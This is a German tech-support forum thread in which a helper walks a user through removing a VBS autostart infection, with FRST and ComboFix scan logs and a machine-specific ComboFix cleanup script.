2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache

Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-03-24 00:49

==================== End Of Log ============================

--- --- ---

schrauber 20.04.2014 18:18

Combofix bitte löschen und neu laden, nochmal laufen lassen und das Logfile posten.

fxak 21.04.2014 00:46

Combofx-Logfile:

Code:

ComboFix 14-04-20.01 - Franz 21.04.2014  1:06.2.4 - x64
Microsoft Windows 7 Home Premium  6.1.7600.0.1252.49.1031.18.3764.2038 [GMT 2:00]
ausgeführt von:: c:\users\Franz\Desktop\ComboFix.exe
AV: Avira Desktop *Disabled/Outdated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Disabled/Outdated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((  Dateien erstellt von 2014-03-20 bis 2014-04-20  ))))))))))))))))))))))))))))))
.
.
2014-04-20 23:20 . 2014-04-20 23:20        --------        d-----w-        c:\users\Default\AppData\Local\temp
2014-04-18 21:16 . 2013-09-22 15:47        73266        ----a-w-        c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-04-18 21:14 . 2013-09-22 15:47        73266        ----a-w-        c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
2014-04-16 21:46 . 2014-04-16 21:46        --------        d-----w-        c:\windows\ERUNT
2014-04-16 21:07 . 2014-04-16 21:10        119512        ----a-w-        c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\program files (x86)\Malwarebytes Anti-Malware
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\programdata\Malwarebytes
2014-04-16 21:06 . 2014-04-03 07:51        63192        ----a-w-        c:\windows\system32\drivers\mwac.sys
2014-04-16 21:06 . 2014-04-03 07:51        88280        ----a-w-        c:\windows\system32\drivers\mbamchameleon.sys
2014-04-16 21:06 . 2014-04-03 07:50        25816        ----a-w-        c:\windows\system32\drivers\mbam.sys
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\users\Franz\AppData\Local\Programs
2014-04-16 00:52 . 2014-04-16 00:52        --------        d-----w-        c:\programdata\Panda Security
2014-04-16 00:52 . 2014-04-16 00:52        --------        d-----w-        c:\program files (x86)\Panda USB Vaccine
2014-04-14 08:43 . 2014-04-20 03:21        --------        d-----w-        C:\FRST
2014-04-07 07:32 . 2014-04-09 08:19        --------        d-----w-        C:\[Smad-Cage]
2014-04-07 07:30 . 2014-04-07 07:30        --------        d-----w-        c:\programdata\Kaspersky Lab Setup Files
2014-04-02 06:19 . 2014-04-02 06:54        --------        d-----w-        c:\users\Franz\AppData\Local\NPE
2014-04-02 06:19 . 2014-04-02 06:19        --------        d-----w-        c:\programdata\Norton
2014-03-25 07:40 . 2014-03-25 07:40        --------        d-----w-        C:\found.001
.
.
.
((((((((((((((((((((((((((((((((((((  Find3M Bericht  ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-04 12:17 . 2012-07-17 13:37        22240        ----a-w-        c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
((((((((((((((((((((((((((((  Autostartpunkte der Registrierung  ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt.
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetLimiter"="c:\program files\NetLimiter 3\NLClientApp.exe" [2011-03-21 2910208]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BackupManagerTray"="c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" [2010-03-08 260608]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-04-21 98304]
"LManager"="c:\program files (x86)\Launch Manager\LManager.exe" [2010-05-26 960080]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-12 43848]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2014-02-20 689744]
"HP Software Update"="c:\program files (x86)\Hp\HP Software Update\HPWuSchd2.exe" [2011-10-28 49208]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
.
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
wtbchkxbde..vbs [2013-9-22 73266]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Acer VCM.lnk - c:\program files (x86)\Acer\Acer VCM\AcerVCM.exe [2013-4-16 704032]
VR-NetWorld Auftragsprüfung.lnk - c:\program files (x86)\VR-NetWorld\vrtoolcheckorder.exe /autostart [2014-1-9 1137664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 AmUStor;AM USB Stroage Driver;c:\windows\system32\drivers\AmUStor.SYS;c:\windows\SYSNATIVE\drivers\AmUStor.SYS [x]
R3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x]
R3 ATHDFU;Atheros Valkyrie USB BootROM;c:\windows\system32\Drivers\AthDfu.sys;c:\windows\SYSNATIVE\Drivers\AthDfu.sys [x]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x]
R3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x]
R3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 NLNdisPT;NetLimiter Ndis Protocol Service;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x]
S1 nltdi;nltdi;c:\program files\NetLimiter 3\nltdi.sys;c:\program files\NetLimiter 3\nltdi.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x]
S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x]
S2 DsiWMIService;Dritek WMI Service;c:\program files (x86)\Launch Manager\dsiwmis.exe;c:\program files (x86)\Launch Manager\dsiwmis.exe [x]
S2 ePowerSvc;Acer ePower Service;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [x]
S2 NTI IScheduleSvc;NTI IScheduleSvc;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [x]
S2 RS_Service;Raw Socket Service;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe [x]
S2 UNS;Intel(R) Management & Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S2 Updater Service;Updater Service;c:\program files\Acer\Acer Updater\UpdaterService.exe;c:\program files\Acer\Acer Updater\UpdaterService.exe [x]
S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x]
S3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECIx64.sys;c:\windows\SYSNATIVE\DRIVERS\HECIx64.sys [x]
S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdpmd64.sys;c:\windows\SYSNATIVE\DRIVERS\igdpmd64.sys [x]
S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x]
S3 NLNdisMP;NLNdisMP;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
S3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
.
.
--- Andere Dienste/Treiber im Speicher ---
.
*NewlyCreated* - CDFS
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-04-02 06:02        1150280        ----a-w-        c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe
.
Inhalt des "geplante Tasks" Ordners
.
2014-04-20 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
2014-04-20 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AmIcoSinglun64"="c:\program files (x86)\AmIcoSingLun\AmIcoSinglun64.exe" [2009-09-22 323584]
"mwlDaemon"="c:\program files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe" [BU]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-04-21 166424]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-04-21 391192]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-04-21 413720]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-20 9996320]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2010-01-20 877600]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2010-05-25 585376]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2010-05-25 354464]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2010-03-09 345648]
"Acer ePower Management"="c:\program files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe" [2010-02-02 496160]
"BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 108144]
"wtbchkxbde"="wscript.exe" [2009-07-14 168960]
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.com.ph/intl/en/
uLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mStart Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: An OneNote s&enden - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
IE: Nach Microsoft E&xcel exportieren - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 172.20.10.1
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10e.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10e.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Zeit der Fertigstellung: 2014-04-21  01:41:59
ComboFix-quarantined-files.txt  2014-04-20 23:41
.
Vor Suchlauf: 23 Verzeichnis(se), 32.543.174.656 Bytes frei
Nach Suchlauf: 24 Verzeichnis(se), 32.351.719.424 Bytes frei
.
- - End Of File - - 5DF84863D0CA34F0EF60B76EAB81F85C

Virus ist nach wie vor da

schrauber 21.04.2014 20:47

Hinweis für Mitleser:
Folgendes ComboFix Skript ist ausschließlich für diesen User in dieser Situtation erstellt worden.
Auf keinen Fall auf anderen Rechnern anwenden, das kann andere Systeme nachhaltig schädigen!

Lösche die vorhandene Combofix.exe von deinem Desktop und lade das Programm vom folgenden Download-Spiegel neu herunter:
BleepingComputer.com
und speichere es erneut auf dem Desktop (nicht woanders hin, das ist wichtig)!

Drücke die Windows + R Taste --> Notepad (hinein schreiben) --> OK

Kopiere nun den Text aus der folgenden Codebox komplett in das leere Textdokument.
Code:

File::
c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
Registry::
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wtbchkxbde"=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wtbchkxbde"=-

Speichere dies als CFScript.txt auf Deinem Desktop.

Wichtig:
  • Stelle deine Anti Viren Software temprär ab. Dies kann ComboFix nämlich bei der Arbeit behindern.
    Danach wieder anstellen nicht vergessen!
  • Bewege nicht die Maus über das ComboFix-Fenster oder klicke in dieses hinein.
    Dies kann dazu führen, dass ComboFix sich aufhängt.
  • Schließe alle laufenden Programme. Gehe sicher das ComboFix ungehindert arbeiten kann.
  • Mache nichts am PC solange ComboFix läuft.
http://i266.photobucket.com/albums/i.../CFScriptB.gif
  • In Bezug auf obiges Bild, ziehe CFScript.txt in die ComboFix.exe
  • Wenn ComboFix fertig ist, wird es ein Log erstellen, C:\ComboFix.txt. Bitte füge es hier als Antwort ein.
Falls im Skript die Anweisung Suspect:: oder Collect:: enthalten ist, wird eine Message-Box erscheinen, nachdem Combofix fertig ist. Klicke OK und folge den Aufforderungen/Anweisungen, um die Dateien hochzuladen.

fxak 22.04.2014 03:14

ComboFix.txt:

Code:

ComboFix 14-04-20.01 - Franz 22.04.2014  3:32.3.4 - x64
Microsoft Windows 7 Home Premium  6.1.7600.0.1252.49.1031.18.3764.2088 [GMT 2:00]
ausgeführt von:: c:\users\Franz\Desktop\ComboFix.exe
Benutzte Befehlsschalter :: c:\users\Franz\Desktop\CFScript.txt
AV: Avira Desktop *Disabled/Outdated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Disabled/Outdated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Neuer Wiederherstellungspunkt wurde erstellt
.
FILE ::
"c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs"
"c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs"
.
.
((((((((((((((((((((((((((((((((((((  Weitere Löschungen  ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
.
.
(((((((((((((((((((((((  Dateien erstellt von 2014-03-22 bis 2014-04-22  ))))))))))))))))))))))))))))))
.
.
2014-04-22 01:44 . 2014-04-22 01:44        --------        d-----w-        c:\users\Default\AppData\Local\temp
2014-04-22 00:40 . 2014-04-22 00:40        --------        d-----w-        c:\program files (x86)\Smadav
2014-04-22 00:40 . 2014-04-22 00:40        --------        d-----w-        c:\users\Franz\AppData\Roaming\Smadav
2014-04-18 21:16 . 2013-09-22 15:47        73266        ----a-w-        c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-04-18 21:14 . 2013-09-22 15:47        73266        ----a-w-        c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
2014-04-16 21:46 . 2014-04-16 21:46        --------        d-----w-        c:\windows\ERUNT
2014-04-16 21:07 . 2014-04-16 21:10        119512        ----a-w-        c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\program files (x86)\Malwarebytes Anti-Malware
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\programdata\Malwarebytes
2014-04-16 21:06 . 2014-04-03 07:51        63192        ----a-w-        c:\windows\system32\drivers\mwac.sys
2014-04-16 21:06 . 2014-04-03 07:51        88280        ----a-w-        c:\windows\system32\drivers\mbamchameleon.sys
2014-04-16 21:06 . 2014-04-03 07:50        25816        ----a-w-        c:\windows\system32\drivers\mbam.sys
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\users\Franz\AppData\Local\Programs
2014-04-16 00:52 . 2014-04-16 00:52        --------        d-----w-        c:\programdata\Panda Security
2014-04-16 00:52 . 2014-04-16 00:52        --------        d-----w-        c:\program files (x86)\Panda USB Vaccine
2014-04-14 08:43 . 2014-04-20 03:21        --------        d-----w-        C:\FRST
2014-04-07 07:32 . 2014-04-22 00:28        --------        d-----w-        C:\[Smad-Cage]
2014-04-07 07:30 . 2014-04-07 07:30        --------        d-----w-        c:\programdata\Kaspersky Lab Setup Files
2014-04-02 06:19 . 2014-04-02 06:54        --------        d-----w-        c:\users\Franz\AppData\Local\NPE
2014-04-02 06:19 . 2014-04-02 06:19        --------        d-----w-        c:\programdata\Norton
2014-03-25 07:40 . 2014-03-25 07:40        --------        d-----w-        C:\found.001
.
.
.
((((((((((((((((((((((((((((((((((((  Find3M Bericht  ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-04 12:17 . 2012-07-17 13:37        22240        ----a-w-        c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
((((((((((((((((((((((((((((  Autostartpunkte der Registrierung  ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt.
REGEDIT4
.
